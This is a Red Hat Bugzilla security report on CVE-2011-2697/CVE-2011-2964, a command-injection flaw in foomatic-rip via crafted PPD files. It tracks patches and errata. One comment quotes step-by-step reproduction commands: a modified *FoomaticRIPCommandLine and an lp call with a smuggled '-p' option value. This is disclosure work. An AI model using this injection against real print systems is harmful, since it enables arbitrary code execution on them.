This service will be undergoing maintenance at 00:00 UTC, 2016-08-01. It is expected to last about 1 hours
Bug 721001 - (CVE-2011-2697) CVE-2011-2697 foomatic: Improper sanitization of command line option in foomatic-rip
CVE-2011-2697 foomatic: Improper sanitization of command line option in fooma...
Status: CLOSED ERRATA
Product: Security Response
Classification: Other
Component: vulnerability (Show other bugs)
unspecified
All Linux
medium Severity medium
: ---
: ---
Assigned To: Red Hat Product Security
public=20110607,reported=20110713,sou...
: Security
Depends On: 725631 725632 725633 833897
Blocks: 721067
  Show dependency treegraph
 
Reported: 2011-07-13 10:18 EDT by Jan Lieskovsky
Modified: 2012-06-20 10:07 EDT (History)
3 users (show)

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2011-08-01 12:00:55 EDT
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:


Attachments (Terms of Use)
Local copy of "enhanced patch from upstream for the current C code foomatic-rip" (#c24 in Novell bugzilla) patch (8.53 KB, patch)
2011-07-13 10:24 EDT, Jan Lieskovsky
no flags Details | Diff
Local copy of "enhanced patch from upstream for the older foomatic-rip Perl script" (#c25 in Novell bugzilla) patch (14.05 KB, patch)
2011-07-13 10:25 EDT, Jan Lieskovsky
no flags Details | Diff
ppd containing cupsFilter (3.35 KB, application/x-gzip)
2011-07-26 02:47 EDT, Huzaifa S. Sidhpurwala
no flags Details

  None (edit)
Description Jan Lieskovsky 2011-07-13 10:18:58 EDT
It was found that foomatic-rip universal print filter did not properly sanitize content of "files to be printed" command line argument, prior performing of the print job. A remote attacker could provide a specially-crafted PostScript Printer Description (PPD) file and trick the local user into printing it, which once performed could lead to arbitrary code execution with the privileges of the user running the foomatic-rip tool.

References:
[1] https://bugzilla.novell.com/show_bug.cgi?id=698451
[2] http://www.openwall.com/lists/oss-security/2011/07/13/3
    (CVE Request)

Proposed patch against the foomatic-rip C-source code:
[3] https://bugzilla.novell.com/show_bug.cgi?id=698451#c24

Proposed patch against the foomatic-rip Perl script:
[4] https://bugzilla.novell.com/show_bug.cgi?id=698451#c25
Comment 1 Jan Lieskovsky 2011-07-13 10:24:15 EDT
Created attachment 512673 [details]
Local copy of "enhanced patch from upstream for the current C code foomatic-rip" (#c24 in Novell bugzilla) patch
Comment 2 Jan Lieskovsky 2011-07-13 10:25:09 EDT
Created attachment 512674 [details]
Local copy of "enhanced patch from upstream for the older foomatic-rip Perl script" (#c25 in Novell bugzilla) patch
Comment 3 Jan Lieskovsky 2011-07-13 10:26:29 EDT
This issue affects the versions of the foomatic package, as shipped with Red Hat Enterprise Linux 4, 5, and 6.

--

This issue affects the versions of the foomatic package, as shipped with Fedora release of 14 and 15. Please schedule an update.
Comment 4 Jan Lieskovsky 2011-07-13 10:28:14 EDT
Created foomatic tracking bugs for this issue

Affects: fedora-all [bug 721008]
Comment 5 Jan Lieskovsky 2011-07-13 10:37:46 EDT
Further detail from Novell bugzilla [1] how to reproduce the issue
(scenario would need to be modified a bit though, to successfully apply to foomatic-rip versions, shipped across Red Hat products):
==============================================================================

How to reproduce with foomatic-rip:

1.
Set up a queue which uses foomatic-rip
i.e. use a PPD which has an "*cupsFilter: ... foomatic-rip" entry:

# lpadmin -p testy2 -v file:/dev/null \
 -P
/usr/share/cups/model/OpenPrintingPPDs/ghostscript/Generic-PCL_5c_Printer.ljet4.ppd.gz
\
 -E

If you don't have openSUSE 11.4 the Generic-PCL_5c_Printer.ljet4.ppd.gz
is located in /usr/share/cups/model/Generic/PCL_5c_Printer-ljet4.ppd.gz

2.
Get the PPD as normal user:

$ wget http://localhost:631/printers/testy2.ppd
...
2011-06-07 12:38:59 (795 MB/s) - `testy2.ppd' saved [13829/13829]

3.
Modify the PPD as normal user:

Change the *FoomaticRIPCommandLine: entry (up to the *End line)
as one likes, e.g. to this single line (without *End line:
*FoomaticRIPCommandLine: "/bin/cp /etc/SuSE-release /tmp/testy2.out"

4.
Print a dummy job to find out the current job id as normal user:

$ echo Hello | lp -d testy2
request id is testy2-111

5.
Print the malicious job as normal user:

$ lp -d testy -U'-p/var/spool/cups/d00112-001' \
 -o document-format=text/plain testy2.ppd
request id is testy-112

6:
Verify that the FoomaticRIPCommandLine was actually executed:

# ls -l /tmp/testy2.out
-rw------- 1 lp lp 57 Jun  7 12:40 /tmp/testy2.out

# cat /tmp/testy2.out
openSUSE 11.4 (x86_64)
VERSION = 11.4
CODENAME = Celadon

==============================================================================

And one correction regarding point 5. yet:

How to reproduce with foomatic-rip:
...
5.
Print the malicious job as normal user:

$ lp -d testy2 -U'-p/var/spool/cups/d00112-001' \
 -o document-format=text/plain testy2.ppd
request id is testy2-112
Comment 10 Jan Lieskovsky 2011-07-18 08:38:40 EDT
The CVE identifier of CVE-2011-2697 has been assigned to this issue:
http://www.openwall.com/lists/oss-security/2011/07/18/3
Comment 12 Huzaifa S. Sidhpurwala 2011-07-26 02:47:58 EDT
Created attachment 515184 [details]
ppd containing cupsFilter
Comment 15 Vincent Danen 2011-07-29 17:51:36 EDT
MITRE has assigned two CVE names here:


Common Vulnerabilities and Exposures assigned an identifier CVE-2011-2697 to
the following vulnerability:

Name: CVE-2011-2697
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2697
Assigned: 20110711
Reference: http://www.openwall.com/lists/oss-security/2011/07/13/3
Reference: http://www.openwall.com/lists/oss-security/2011/07/18/3
Reference: http://www.openwall.com/lists/oss-security/2011/07/28/1
Reference: https://bugzilla.novell.com/show_bug.cgi?id=698451
Reference: https://bugzilla.redhat.com/show_bug.cgi?id=721001

foomatic-rip-hplip in HP Linux Imaging and Printing (HPLIP) 3.11.5
allows remote attackers to execute arbitrary code via a crafted
*FoomaticRIPCommandLine field in a .ppd file.


Common Vulnerabilities and Exposures assigned an identifier CVE-2011-2964 to
the following vulnerability:

Name: CVE-2011-2964
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2964
Assigned: 20110729
Reference: http://www.openwall.com/lists/oss-security/2011/07/13/3
Reference: http://www.openwall.com/lists/oss-security/2011/07/18/3
Reference: http://www.openwall.com/lists/oss-security/2011/07/28/1
Reference: https://bugzilla.novell.com/show_bug.cgi?id=698451
Reference: https://bugzilla.redhat.com/show_bug.cgi?id=721001

foomaticrip.c in foomatic-rip in foomatic-filters in Foomatic 4.0.6
allows remote attackers to execute arbitrary code via a crafted
*FoomaticRIPCommandLine field in a .ppd file, a different
vulnerability than CVE-2011-2697.
Comment 16 Huzaifa S. Sidhpurwala 2011-07-31 22:55:24 EDT
Looking at the description of the CVEs from above:

CVE-2011-2697 is for the perl version in foomatic 3.x:
Affects: rhel-4 , rhel-5

CVE-2011-2964 is for the C version in foomatic 4.x:
Affects: rhel-6, Fedora
Comment 17 Huzaifa S. Sidhpurwala 2011-07-31 23:25:16 EDT
Keeping this bug for the perl issue.
Comment 18 errata-xmlrpc 2011-08-01 11:56:24 EDT
This issue has been addressed in following products:

  Red Hat Enterprise Linux 4
  Red Hat Enterprise Linux 5

Via RHSA-2011:1109 https://rhn.redhat.com/errata/RHSA-2011-1109.html

Note You need to log in before you can comment on or make changes to this bug.